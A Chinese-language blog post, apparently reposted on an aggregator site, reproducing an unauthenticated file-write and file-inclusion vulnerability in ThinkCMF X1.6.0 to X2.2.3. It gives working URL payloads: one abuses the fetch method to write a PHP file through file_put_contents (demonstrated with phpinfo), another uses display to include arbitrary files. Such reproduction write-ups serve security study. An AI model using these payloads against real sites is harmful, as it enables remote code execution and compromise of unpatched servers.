首页 > 其他 > 详细

ThinkCMF框架任意内容包含漏洞复现

时间:2019-11-12 21:48:43      阅读:86      评论:0      收藏:0      [点我收藏+]

 

1. 漏洞概述

ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。

利用此漏洞无需任何权限情况下,构造恶意的url,可以向服务器写入任意内容的文件,实现远程代码执行

 

2.影响范围

1     ThinkCMF X1.6.0
2     ThinkCMF X2.1.0
3     ThinkCMF X2.2.0
4     ThinkCMF X2.2.1
5     ThinkCMF X2.2.2
6     ThinkCMF X2.2.3

 

 

3.复现

环境搭建

我用的是phpstudy搭建ThinkCMF X2.2.3 

要用nginx,不然提示没有权限

技术分享图片

 

 

根据安装向导安装即可

技术分享图片

 

 

4.漏洞利用

方法一:

通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件

phpinfo版payload如下:

1 ?a=fetch&templateFile=public/index&prefix=‘‘&content=<php>file_put_contents(test.php,<?php phpinfo(); ?>)</php>

利用结果

技术分享图片

访问写入的文件

技术分享图片

 

第二种

通过构造a参数的display方法,实现任意内容包含漏洞

payload:

1 ?a=display&templateFile=README.md

 

技术分享图片

 

 

 

 

参考文章:

https://www.freebuf.com/vuls/217586.html

 

ThinkCMF框架任意内容包含漏洞复现

原文:https://www.cnblogs.com/lanyincao/p/11844537.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!